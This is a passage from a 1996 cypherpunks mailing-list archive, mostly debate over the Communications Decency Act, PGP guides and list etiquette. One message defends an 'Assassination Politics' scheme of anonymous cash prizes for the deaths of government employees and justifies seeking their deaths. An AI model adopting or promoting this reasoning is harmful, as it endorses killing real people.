by deleting them quickly, probably isn't in a position to "write code"
anyway, so what's the issue? No, what I really think the issue is for these
"control freaks" (to use the accepted term) is that it simply grates on
them that other people are not more like themselves, are not interested in
the same things they are at the same time they are. And they think that by
scolding others they can force them to change their ways. Guess what? It
doesn't work.)

I was recently accused in private mail, and maybe public mail as well, by
someone of "diverting" the list into a discussion of the Hiroshima bomb and
its moral implications. I disagree. When Rich Graves asked originally, "Who
holds up the nuking of Hiroshima and Nagasaki as great victories against
tyranny?" I said "Since you ask, I do. A land invasion of Japan would've
likely cost half a million American lives, and perhaps a million or more
Japanese citizen lives, according to comprehensive studies I think are on
the mark."

This simple response--admittedly not related to DES or IETF or even
Netscape--elicited flames, charges of racism, counter-arguments, and such.
So? While I chose to sit out most of that flame war, you didn't hear me
wailing "Can't we just get back to talking about Diffie-Hellman?"

This is what filters are for. And what ignoring threads is for.

I repeat, if you want others to spend more time talking about the things
that you think need talking about, then set an example and begin the
conversation. Don't just childishly wail about what others are talking
about isn't "on charter."

--Tim May, who will continue to write about what he wishes to write about

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: avatar@mindspring.com
Date: Sun, 11 Feb 1996 04:30:27 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Yeah, Yeah But what are we gonna do!
Message-ID: <199602101947.OAA25312@borg.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:17 PM 2/10/96 -0500, you wrote:
>Spam beget filters.
>
>Most congresscritters delete email from people other than their
>constituents already.
>
>Adam
>


Untrue most of them have responded to my correspondence.
For example, I live in Atlanta Ga. and Senator Bradley is a representative
of New Jersey. Here is his letter. By the way I have many more from
many other members of both House and Senate.
					              
     Thank you for contacting me to express your views concerning
     the Communications Decency Act of 1995, which was recently passed as 
     part of S. 652, the Telecommunications Act of 1995.  I greatly 
     appreciated the opportunity to review your thoughts on this issue.
     
          Although the advances being made in our nation's information
     and communications network are revolutionary and welcome, they also 
     provide openings for individuals to transmit obscene materials to 
     children and to lure children.  Throughout my career in the U.S. 
     Senate, I have consistently encouraged the recording industry and the 
     television industry to limit explicit violence and sex on television.  
     Given the widespread growth of information networks, I supported the 
     Communications Decency Act as a means to curtail children's exposure 
     to offensive materials and to give parents some control over the 
     things their children see and hear.
     
          While I supported this amendment because I believe there is a
     need for some safeguards against obscenity, I do have some concerns 
     about the implementation of this provision, if it becomes law. There 
     should be a distinction between indecent and obscene material, as 
     there is in other relevant laws.  Furthermore, this particular 
     amendment does not adequately reflect the unique nature of the 
     Internet, in which information crosses many computers and access 
     points before reaching the user.  Finally, I was disappointed that the 
     Senate did not have an opportunity to consider an alternative proposal 
     suggested by Senator Leahy.  This measure would have provided more 
     safeguards to ensure that First Amendment rights were preserved, but 
     still would have accomplished the overall objective of the adopted 
     version. 
     
          Determining who should be held responsible for disseminating
     obscene material may be difficult.  I am concerned that this could 
     lead to an overall chilling effect on online communication as users 
     fear that they may be held responsible for material they did not 
     originate.
     
          Please be assured that I will keep your views in mind as the
     joint House-Senate conference committee attempts to reconcile the 
     differences between the two versions of the Telecommunications Act of 
     1995. 
     
          Again, thank you for contacting me to share your views.  I
     hope to hear from you again in the near future.
     
          Best wishes.
      
     
                                     Senator Bill Bradley
                                     Washington, DC 20510
                                     (202)224-3224
>
Charles Donald Smith Jr.

||The government  is my shepherd I need not work. It alloweth me to lie
 down on a good job. It leadeth me beside stilled factories. It destroyeth
 my initiative. It leadeth me in the path of a parasite for politics sake. YEA,
 though I walk through the valley of laziness and deficet spending I shall
 fear no evil, for the government is with me. It prepareth an economic utopia
 for me by appropriating the earnings of my grandchildren. It filleth my head
 with false security. My inefficiency runeth over. Surely, the government 
should care for me all the days of my life, and I will dwell in a fools paradise
forever.................AMEN!   || nuke'm if ya got'em||





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 11 Feb 1996 04:50:32 +0800
To: cypherpunks@toad.com
Subject: Re: [silly] Re: OK, how *do* you spell it?
In-Reply-To: <2.2.32.19960210184124.0091cac0@mail.teleport.com>
Message-ID: <ZPm4iD18w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Olsen <alano@teleport.com> writes:
> At 11:58 AM 2/10/96 -0500, Robert Hettinga wrote:
> >I got a spelling ping this morning.
> >
> >I'd never really thought about it, before.
> >
> >Is it infocalypse or infoclypse?
>
> It is Infocalypso.
>
> Infocalypso is a new dance involving laptops.  It is similar to clog
> dancing, except the laptops are hit together in a rhythmic fashion while a
> lively beat is played on magnetic drums.  It is usually found in countrys
> which have alot of spare laptops.  It was made popular during certain MIT
> social gatherings and EFF meetings. The dance has gotten more and more
> violent as the speed of laptops have increased.

Could someone please point out to me the crypto-relevance of this nonsense,
if any?

Thank you.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: deepthroat@alpha.c2.org
Date: Sun, 11 Feb 1996 08:50:39 +0800
To: cypherpunks@toad.com
Subject: The Communications Decency Act
Message-ID: <199602102336.PAA02080@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Why The Communications Decency Act passed, or
Follow the money



	There's been a lot of commentary the last few days about this
bill, this strange creature, seemingly of the 'Christian Right.'  Talk
of how and why its unconstitutional, protests; web pages blackened.
But, oddly, no one seems to have examined who pushed the bill through
Congress, or why.

	Theres been a lot of talk lately about 'the rise of the new
media,' how first interactive TV, then the net, are going to become
this new thing, a way of getting news events.  The 'old media' even
reported on it; how could it not, it was being pre-empted.  IRC beat
CNN five years ago during the US-Iraq war.  Bill Clinton's campaign
took his message (a little) to the net, a little to MTV.  But where
does that leave the big guys?  ABC, NBC, CBS??  Can they survive in
this brave new world which the net threatens to be?

	By and large, they looked at themselves, and saw they could
not.  They are gargantuan dinosaurs, threatened by, well, hell,
you've heard the metaphors.  So had the dinosaurs.  And, as you should
have expected, they reacted, the main way they knew how.  They bought
themselves a law.  This is the way broadcasters have always worked.
When there was competition, they created the F.C.C. to tell them what
to say and not say.  When cable came along, and threatened to destroy
them, they got cable regulated.  It was interstate commerce after all.
Not that space in the ground is a scarce resource, but the
broadcasters are a powerful group.  They create and maintain
campaigns, name recognition, politicians.

	And they were threatened.  Not only where they threatened, but
their symbiotes, the politicians they created and maintained, where
threatened.  Theres not a politician alive who doesn't remember how
Nixon looked next to Kennedy.  But now, they understand the game, and
they play it.

	Kristol once defined conservatism as the fear of change.  Big
Media is inherently conservative, and with good reason.  They make
lots of money the way things are.  They don't want that to change.
And they weren't going to let it.

	The net is free-wheeling, easy going, and useful.  Its not the
stiltified, self-referential, wasteland of television.  It has to be
stopped.

	But how to do it?  You can't very well say 'This threatens our
business interests,' when you're as widely disliked as the mass media.
You need allies.  You need a cover story.  A Gulf of Tonkin incident.
You need to protect the children.  And who more manipulable today than
the religious right?  Heads spinning with newfound power and
influence, they're the perfect dupes, with a perfect cause.

	And in driving through a bill to castrate the internet, the
religious right had the perfect ally.  The media.  After all, the
media is running scared.  They're not going to present this as a big
government issue, or a matter of censorship.  They're not even going
to portray the opposition.  They're going to portray it as reasonable
people, protecting our kids, vs ACLU free speech absolutists.

	And they did.  The CDA passed.  Not only did it pass, it
steamrollered the opposition, because the opposition didn't see what
was coming.  We were deer in their headlights, and now they're
feasting on roadkill.

	So what do we do about it?  The satisfying response would be
to kill your television.  But that really doesn't do any good.
Neither does killing your Senator.  Ignoring it, in a massive act of
uncivil disobedience might work.  But turn your web pages obscene
won't carry the big ISPs, the way turning them black did.  What a
waste of time.  (Actually, it might not have been.  People on the web
now all know about the CDA, and can't claim ignorance.)

	So ignoring it might work.  But a better response is
arbitrage.  Move your web business to Anguilla.  Jersey.  The Isle of
Man.  The Seychelles.  It doesn't cost much more than hosting them in
the USA.  Tell your Senators.  Tell your Representatives.  Tell your
President.  But most importantly, tell your friends.  Your relatives.
Your customers.  Let business flee these expensive halls, and see how
long the regulations last.  No Senator can vote against the
information superhighway, and when it becomes clear to every American
that the CDA is causing America to become a backwater, the rules may
change.


DT.
Deepthroat@alpha.c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: printing@explicit.com (William Knowles)
Date: Sun, 11 Feb 1996 06:37:41 +0800
To: Cypherpunks@toad.com
Subject: Re: The Agincourt Project
Message-ID: <m0tlNHP-001VxbC@sashimi.wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


Here is a thank you rant from the OCAF that I got in
my mail today.  

William Knowles
printing@explicit.com


--(Fwd)--

>From Oklahomans for Children And Families (OCAF)
ocaf@aol.com
ocaf@telepath.com
-----------------


Thank you for requesting our document "The Agincourt Project".
We hope you have had time to read and digest it.  And we very
much hope you will join us in our fight to end illegal pornography
and child pornography on the Internet.

-  If you are a concerned citizen, we hope you will follow the
   suggestions in our Action Plan.  We need your help to get
   our document in the hands of law enforcement officials
   across America.  This is a complicated issue, but we have
   found that once the police and prosecuting attorneys
   understand how an ISP operates, the criminal liability of
   the ISP becomes obvious.

-  If you are a law enforcement official or a prosecuting
   attorney responding to our notices of potential illegal
   activity in your jurisdiction, we are ready to answer
   any questions you or your staff may have.

-  If you are a representative of a media organization, we 
   stand ready to answer any questions you may have and to
   make ourselves available for interviews.

-  And, finally, if your are an Internet Service Provider
   who is concerned about our activities, your concern is 
   justified.  We hope that you have already made the 
   decision to remove illegal pornography and child
   pornography from your news server.  And we sincerely
   thank you if you have done so.  If you have not, 
   please understand that we are receiving help from
   concerned citizens across the United States.  Sooner
   or later, the police in your area will be contacted.

   Also understand that we do not intend to find one large
   ISP for a test case.  We are encouraging law enforcement
   in every city to use existing laws to put an end to 
   the illegal pornography and child pornography in 
   newsgroups. 
   
Again, thank you for your interest in our work.


--(End fwd)--





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@grendel.texas.net>
Date: Sun, 11 Feb 1996 06:29:24 +0800
To: "Lynne L. Harrison" <lharrison@mhv.net>
Subject: Re: Need a "warning" graphic of some kind for CDA
In-Reply-To: <9602101815.AA22921@mhv.net>
Message-ID: <199602102158.PAA01166@grendel.texas.net>
MIME-Version: 1.0
Content-Type: text/plain


"Lynne L. Harrison" <lharrison@mhv.net> said:

LLH> At 11:26 AM 2/10/96 -0600, Sten Drescher wrote:
>>  Then why didn't the Prez announce that he was ordering the Justice
>> Department to not defend the CDA provisions, like he did the AIDS
>> expulsion provision in the military spending bill?

LLH>    Because it's an election year and, IMO, the topics he
LLH> discussed in his State of the Union address gave a clear message
LLH> that he was going to sign this bill.

	He signed the military spending bill, too.  And, unfortunately
(because of the bigotry it reflects), being painted as protecting gays
isn't going to be much better than being painted as protecting
pornography.  My point is that Clinton _doesn't_ have the same "this
provision is unconstitutional" feeling about the CDA as he does about
the AIDS provision.

-- 
#include <disclaimer.h>                               /* Sten Drescher */
Unsolicited email advertisements will be proofread for a US$100/page fee.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: um@c2.org (Ulf Moeller)
Date: Sun, 11 Feb 1996 13:50:38 +0800
To: cypherpunks@toad.com
Subject: Re: DSN
Message-ID: <m0tlGra-0000A3C@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart <stewarts@ix.netcom.com> wrote:

>>[RSA in 5 lines of Scheme, deleted.]
>Got any short prime-number generators?

I am writing some more Scheme code (not optimized for size, though).
Have a look at http://www.thur.de/ulf/crypt.scm

-- 
Ulf Möller   *   E-Mail: <um@c2.org>   *   WWW: http://www.c2.org/~um/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nag.cs.colorado.edu>
Date: Sun, 11 Feb 1996 20:08:51 +0800
To: bruce@aracnet.com
Subject: Re: Privacy Without Tears
In-Reply-To: <199602102136.NAA11894@trapdoor.aracnet.com>
Message-ID: <199602102312.QAA00601@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

> I've started work on what I currently call Privacy Without Tears, a guide to 
> PGP and related programs pitched specifically at a novice audience.


Excellent.  This is much-needed.  Please see
"http://www.c2.org/~bryce/WhatIsPGP.html", and consider
cross-linking with me.  I'd rather point people to your
novice guide than to Stale's International PGP pages.  


I wrote BAP for the same reason-- clueless newbies needed to
be able to use PGP.  My mother is able to successfully use
BAP, so I consider it a great success.  Unfortunately since
I am distributing it in return for electronic cash I have
limited myself to a higher-tech audience than the program
was actually intended for.  I'm still considering what to do
about this dilemma...


Regards,

Bryce

                 "Toys, Tools and Technologies"
  the Niche 
        New Signal Consulting -- C++, Java, HTML, Ecash
            Bryce 
 
PGP sig follows



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMR0mW/WZSllhfG25AQFU1AQApQq4Bm2ncnzo8Sgq0T+MYJfvju00DbQD
+HJWI50pqFocMSLWFGiQO+l2RvGzX10akY8c/EDjA70uov6Rp/MFw3GsiG4tM1mJ
mxDtjn16xbrh/Xcr3aSJgPFbeh6Qtb0VDxVFBzQOq4xxrvzEMVm5v+MosKHKI29Q
h5TDCXbevvc=
=+DmR
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 11 Feb 1996 08:52:40 +0800
To: amp@pobox.com
Subject: Re: Strange Sounds of Silence
In-Reply-To: <199602102305.SAA05611@camus.delphi.com>
Message-ID: <Pine.SOL.3.91.960210161935.6505A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 10 Feb 1996, Alan Pugh wrote:

> The Strange Sounds of Silence
> 
> Has anyone else out there noticed the strange sounds of silence
> emmanating from the american print and broadcast media concerning the
> rider attached to the Telecommunications Act recently signed by
> President Clinton known as the CDA (Communications Decency Act)?
> 

Are you sure? The coverage has been wall to wall out here (Bay area); 
front page above the fold, business pages, computer columns, editorials 
and editorial cartoons. Apparently it's the same level of coverage back 
in the RTP.

What part of the country are you in? I guess the coverage is different 
in the major geek zones like the bay area and RTP

Simon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an5877@anon.penet.fi (deadbeat)
Date: Sun, 11 Feb 1996 02:20:23 +0800
To: cypherpunks@toad.com
Subject: Re: Nyms with keys
Message-ID: <9602101724.AA22523@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

I mostly lurk these days. 

DEADBEAT <na5877@anon.penet.fi>

-----BEGIN PGP SIGNATURE-----
Version: 2.4

iQBFAgUBMRwQdPFZTpBW/B35AQH+7wGAss68V8aPaLMra/yLHtk5CpO2Zt8Yp7B1
qZKr+hOVJmphvZFmC7UmEk8TZu7a1GTY
=zI0k
-----END PGP SIGNATURE-----
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 11 Feb 1996 06:59:29 +0800
To: cypherpunks@toad.com
Subject: The Idiot Chip
Message-ID: <199602102228.RAA04586@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, February 10, 1996


   The Idiot Chip

   By Frank Rich [Columnist]
    
     
   In the annals of dumb solutions to serious problems,
   history will have a ball with the V-chip, the antidote to
   trash TV that became the law of the land on Thursday when
   Bill Clinton signed the telecommunications bill. Far from
   making television safer for children, the V-chip will
   merely postpone and confuse the issue until well into the
   next century -- even as it provides politicians with
   convenient cover.

   By embracing the V-chip, Democrats and Republicans alike
   can posture as if they care about children without actually
   having to do anything to improve their cultural lot.

   Let Mr. V-chip do the job instead!

   The V-chip is a gimmick that has as much to do with
   ameliorating TV for kids as the Forbes flat tax has to do
   with serious tax reform.

   To see why, it's essential to realize that a cultural
   revolution took place in America this week.

   Contrary to the headlines and sound bites, the new
   telecommunications law is not just about cable rates and
   phone service, the explosion of new technologies and the
   unconstitutional effort to stamp out "indecency" and
   abortion information on the Internet.

   If you look at the bigger picture, this law is also about
   a mammoth expansion of mass culture -- more media, more
   outlets -- and a rapid expansion of power for the handful
   of mega-corporations that control it all, from TV, movies,
   music and publishing to both print and electronic news. It
   was perfectly symbolic that on the day Mr. Clinton signed
   the bill, Disney got its official Federal approval to
   swallow up ABC.

   Into this vast new universe of omnipotent media goliaths
   comes the tiny V-chip, designed to help parents block the
   coarse outpourings of an exploding digital universe.

   Common sense alone dooms this gizmo to failure.
  
   Who can rate some 600,000 hours of programming broadcast
   per year by even our current 70-channel cable systems?
   (Hollywood only has to rate roughly 550 movies -- 1,000
   hours -- per year.) Should crime-sated local news be
   blocked? "MASH" reruns? Reports from a future gulf war?
   "E.R."? Pro football? "Schindler's List"? (If so, a network
   may be tempted to duck a V-chip block -- which would lower
   ratings and revenue -- by sanitizing the Holocaust.)

   Even if all the practical, political and legal questions
   raised by the V-chip could be miraculously resolved
   overnight, it is still pie-in-the-sky. The chips are only
   required on new TV sets, so it will be years before most
   households, especially multi-set households, will be in the
   V-chip's harness.

   Even then, parents with kids in different age groups will
   have to choose between their younger and older children as
   they decide whether to flick the switch each night. Weaker
   parents will take the same path of least resistance they do
   now.

   As the founder of Action for Children's Television, Peggy
   Charren has been fighting for kids decades longer than most
   politicians.

   She is not only skeptical that the V-chip will transform
   lax parents into concerned ones, but points out that the
   chip doesn't even address the Saturday morning blight of
   brainwashing commercials ("worse than the programming") for
   violent toys and junk food.

   Nor, Ms. Charren adds, is there any language in the
   telecommunications law to require networks to increase the
   quantity and quality of good children's TV that might offer
   an after-school alternative to "Jenny Jones."

   Mr. Clinton will press for better programming when he meets
   with Hollywood potentates -- some of whom are his campaign
   contributors -- at the White House on Feb. 29. A far
   tougher idea -- one adopted by the British Government last
   month -- is being promoted by the Media Access Project, a
   public-interest organization.

   It argues that the one gift the networks still want from
   Congress and didn't get in the telecommunications law --
   more space on the public airwaves (so-called "spectrum")
   for additional channels -- be given only if they agree to
   cede some of it to public-service broadcasting, including
   top-notch children's TV.

   But the greedy media goliaths will fight any such proposal
   as vehemently as they oppose the V-chip.

   The politicians, hiding behind the V-chip, will let them
   get away with it.

   Delinquent parents, told that their children will soon be
   in the hands of an electronic nanny, will have a new excuse
   for doing nothing.

   And like each TV generation before it, today's children
   will grow up to fight this battle for their children on yet
   another day.

   [End]














From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 11 Feb 1996 11:08:33 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
Message-ID: <m0tlQnv-00092TC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain



At 08:13 PM 2/6/96 -0600, Jim Choate wrote:
>
>Forwarded message:

>> A few months ago, I had a truly and quite literally "revolutionary"
>> idea, and I jokingly called it "Assassination Politics": I speculated on
>> the question of whether an organization could be set up to _legally_
>> announce either that it would be awarding a cash prize to somebody who
>> correctly "predicted" the death of one of a list of violators of
>> rights, usually either government employees, officeholders, or
>> appointees.  It could ask for anonymous contributions from the public,
>> and individuals would be able send those contributions using digital
>> cash.
>> 
>
>If the intent is to motivate others to kill or otherwise harm others simply
>because you don't agree with them or their actions is reprehensible and
>moraly or ethicaly undefensible.

That's a misleading statement:  You said, "simply because..."    As should 
be abundantly clear from my other arguments, I wouldn't wish to see anyone 
killed "simply because"  of the fact I "don't agree with them."  It is their 
ACTIONS that I feel violate my rights; that is what  justifies my seeking 
their deaths, should I choose to do so.


>> On the contrary; my speculation assumed that the "victim" is a
>> government employee, presumably one who is not merely taking a paycheck
>> of stolen tax dollars, but also is guilty of extra violations of rights
>> beyond this. (Government agents responsible for the Ruby Ridge incident
>> and Waco come to mind.)  In receiving such money and in his various
>> acts, he violates the "Non-aggression Principle" (NAP) and thus,
>> presumably, any acts against him are not the initiation of force under
>> libertarian principles.
>> 
>
>Every citizen of this country is a 'government employee' in one sense or
>another.

That's about the weakest argument I've heard in a long time.  I'm amazed 
that you weren't too embarrassed to post it to the list.  While I don't know 
precisely what your definition of the phrase "government employee" really 
is, I "every citizen" is a "governement employee" then you must have a 
REALLY weird definition of that.

Somehow, I think that this is where  your argument fails, and it fails 
miserably.


>By resorting to violence you are no better than the ones you proport to
>protect us against.

Sorry, I disagree.  Now, I am certainly aware of the classic "Gandhi-type" 
total non-violence principle, but it turns out that very few people actually 
believe in that.  Most people seem to think that they are entitled to 
protect themselves from violations of rights.  The fact that these 
violations of rights may be done by "government employees" is at most 
irrelevant, in that this doesn't justify it.  Anybody who feels entitled to 
use violence against a burglar, rapist, or murderer is correct; attempting 
to deny me the right to protect my property from GOVERNMENT people is, in 
itself, a violation of my rights.

Are you a statist?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lunaslide@loop.com
Date: Sun, 11 Feb 1996 10:21:47 +0800
To: <bruce@aracnet.com>
Subject: Re: Privacy Without Tears
Message-ID: <v01530506ad42f80e8480@[204.179.169.65]>
MIME-Version: 1.0
Content-Type: text/plain


>-----BEGIN PGP SIGNED MESSAGE-----
>
>Since it wouldn't do me any good to write code (I've _seen_ my code, it's not
>pretty), I'm writing in English instead. :-)
>
>I've started work on what I currently call Privacy Without Tears, a guide to
>PGP and related programs pitched specifically at a novice audience. I would
>appreciate comments, particularly in the fact-checking line (more on this in
>a  moment). I'd also appreciate anyone who feels like it passing the URL I'll
>give in a moment on to crypto newbies and seeing if they can follow the
>instructions and get good results.

<snip for brevity>

>The URL (for the moment):
>
>http://www.aracnet.com/~bruce/privacy/privacy.html

I've already talked to Bruce through private email and told him I would
start working on a peice for Mac users.  We are on a quest to get people to
use PGP, and it does not have anything to do with platform wars.  If you
have comments, take it to me in private emails.

The point of posting this is a) to let Mac readers of this list know that
they can refer to their Mac friends to the link for info and b)because I
had an idea after talking to Bruce of a great way to get the word spread
even further...

If everyone not only has a link to these pages in text, but also has their
"PGP secured!", or similar little graphic on their pages, linked to these
sites as well, it would save a lot of people a lot of redundant explaining
and it would help spread the word about PGP like wildfire to the masses.
You could also put a "Click for more info on Pretty Good Privacy(tm)" right
next to it to get more people to look.  _This_ is the way to get widespread
attention to and usage of PGP.  The pages on PGP would be linked to each
other and to pages on freedom of speech and privacy and the word would go
far.  By placing a link on your page to the PGP page through the graphic,
you will be placing a link to dozens, eventually hundreds, of pages
detailing PGP as well as sources dedicated to freedom and privacy.

Someone on the list made a comment a bit ago about just having regular old
text on the site to say "PGP secures", but people respond to the graphics
more than anything on web pages.  They want to be able to click everything.
This would be the key.  In the early days of Christianity in Rome,
Christians would sometimes communicate to each other by the use of the
small simple "fish" illustration that you see on cars everywhere.  This
will be our symbols power as well, the communication of a message.

lunaslide

"Prohibition... goes beyond the bounds of reason in that it attempts to
control a man's appetite by legislation and makes a crime out of things
that are not crimes... A prohibition law strikes a blow at the very
principles upon which our government was founded."
- -- Abraham Lincoln

On the meridian of time there is no injustice, only the poetry of motion
creating the illusion of truth and drama.
                                                Henry Miller
________________________________________________________________

Digitally sign your mail too!
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCPAzEX3QEAAAEEAOGQjhnqGH29pO1WDaXs5GFOVPhCBWyYEk9XEwRmscjveWzH
AhA6DeOA480zWNqQURyqE2yPmR8WzT+OXYqmeiQiycKyFA41Vs/Ruf+gXXxe7uXS
L5BK3K8oKbfoH0D5/TAkMT4r6BprXFQz4pFc3gY2SSaSPElpMjKHaKBsRsyRABEB
AAG0HUplZmYgQ29ubiA8bHVuYXNsaWRlQGxvb3AuY29tiQCVAwUQMRffHzKHaKBs
RsyRAQGNhwP9E9xEZ9/LCKnhgtnrqgD7pDoXG2pCy8FoyfFjoImGkG+jF1wELXmB
Z0mf8F8CgYkys0mif1XeGDMelr1gzlZAm6LgQt4kcvztMW/aRLn18QP+iwltVT/L
p8D37mitOjvuk46sWgAChIaPPPIeg/EaYQjQkmlpWKsEYIoTRy+E8mU=
=4Gku
-----END PGP PUBLIC KEY BLOCK-----








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Pugh <ampugh@mci.newscorp.com>
Date: Sun, 11 Feb 1996 07:39:58 +0800
To: cypherpunks@toad.com
Subject: Strange Sounds of Silence
Message-ID: <199602102305.SAA05611@camus.delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


Please reply to amp@pobox.com as this email address dies on the 14th.


-----BEGIN PGP SIGNED MESSAGE-----

AEN News
Commentary by Alan M. Pugh
<mailto:amp@pobox.com>

The Strange Sounds of Silence

Has anyone else out there noticed the strange sounds of silence
emmanating from the american print and broadcast media concerning the
rider attached to the Telecommunications Act recently signed by
President Clinton known as the CDA (Communications Decency Act)?

Here we have a piece of legislation that has enormous ramifications
to the free flow of information and ideas through various electronic
media, and yet we hear hardly a peep from the "defenders of the 1st
amendment". Many readers here have probably noticed the screams of
censorship and gnashing of teeth that accompany any attempt to pass
legislation or regulations that have even tangental relationships to
the 1st amendment. The first amendment has, during this century, been
greatly expanded from the protections it was widely recognised to
afford at the begining of this century. It has been "incorporated"
through the courts to bar states from infringing on our freedoms as
well as the federal government. The definition of "speech" has been
stretched to the point that the act of burning a flag is considered
to be an act of speech, and not destruction of property. (I agree
with the court wholeheartedly on this point.) We've so expanded its
scope, and rightly so, that it is difficult if not impossible to win
in court on a charge of slander or libel. 

The press in this country enjoys wide lattitude. They cannot be
forced to divulge sources except under very specific and limited
circumstances. They have recently been restricted more than in the
past on military operations. These restrictions have garnered almost
universal cries of "censorship!" from those news organizations
affected. 

Why then, when almost all of cyberspace is up in arms over this
provision is this story almost universally ignored or distorted to be
merely an issue of "child pornography" or "protecting our children"?
I recall several prominent news organizations across the country
coming to the aid of Larry Flint, the publisher of _Hustler_ magazine
a few years ago through amicus briefs filed with the court when an
overzealous prosecutor was attempting to nail him for the
distribution of material that violated his puritanical
interpretations of local "community standards".

Where are these papers now? Where is their outrage? I'd like to know
what the difference is between a picture of Michelangelo's David
displayed in an article by the _Smithstonian Institution_, and the
same picture when displayed on someone's home page? Where is the
outrage that someone who makes a copy of _Catcher in the Rye_
available to people who visit their home page who may very well now
be open to prosecution by that same puritanical prosecutor? Where is
it? Has the "free" press in this country suddenly discovered the
virtues of censorship? 

Do these organizations not realize that the precidents that will soon
be laid down on this issue will soon be affecting them as well? Any
major publisher who is not looking at electronic media as a method of
distribution is a fool. The _New York Times_ is now available on the
World Wide Web. Perhaps they are living in a delusion that *they*
will not be held to the same standards that will soon be enforced
against the small publisher who sees the Web as means for cheap mass
distribution. Perhaps for a time, they won't. Eventually, the bird
will come home to roost. One would think that they would understand
that the free flow of information is important enough that we will
have to stand a little pornography and other distasteful material -
the same way we allow magazines to be sold at the local convienience
store. If you don't want to see it, don't look at it. If you don't
want to read racist material, go somewhere else. Noone will *force*
you to consume that which you cannot abide. 

They also do not seem to recognise the international nature of the
internet. It is not something that operates entirely within the
confines of the united States. It is an international community that
reaches nearly every corner of the globe. What is proper to be
displayed in New York City or Los Angeles, is probably not something
that, say the government of Saudi Arabia would like to see available
to its subjects. By the same token, what is deemed to satisfy the
"community standards" of Amsterdam, may very well not fly in many
places in the united States. In order for any government to restrict
access to any country that flaunts its standards, it would have to
disconnect itself from the internet. It is not possible to build
walls around a country and still have all the good benifits of the
internet still available. 

Is it a bad thing for a group of children to be able to become
electronic pen-pals with another group of students in Malaysia, or
Russia? Do we not think that personal relationships with people from
another culture helps personalize our understanding of their
cultures? I think many wars could have been avoided in the past if
each side knew each other better. How can someone claim that "all
russians are evil" when they have a personal relationship with Ivan
in St. Petersburg? 

For better or worse, the technology is now out there. The world will
always be smaller than it once was. We are no longer limited in our
circle of friends by distance or time. (Time could indeed be an issue
if one were attempting to place a phone call to someone in Paris
from Dallas. Many people don't want to talk at 4am their time.) We
are also not limited by the delays and expense of postage. I've met
good people around the world through electronic communications who
have points of view that I would probably never have considered. 

Again I ask, "Where is the media?" Why is the censorship of
individuals a good thing? Don't come crying to me when you find, a few
years down the road that this camel's nose has snuck into the tent
with its bad breath, prelediction to spit, and no potty training.

Since this message is being transmitted electronically, I feel that
it is my moral duty to include the following so this message will
fall under the purview of the act I so abhor.

Shit, Piss, Cunt, Fuck, Cocksucker, Motherfucker, and Teats.

There they are. Come and get me Big Brother.

=end of article=

This article was digitally signed with PGP so as to further aid
prosecutors. A signed document is hard to deny.

amp
<0003701548@mcimail.com>
<alan.pugh@internetmci.com>
PGP Key = 57957C9D
February 10, 1996   15:23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMRz+6YdTfgZXlXydAQG2qgf+Omae9/yVYvcyX1ADp6mmSHQJlQJ3qS4C
AnT4VK4AepDHnqrh7gVsNPQB58QAWekY4IZBGws0mdxDQF9h3q8+pu+CNEFB2CDo
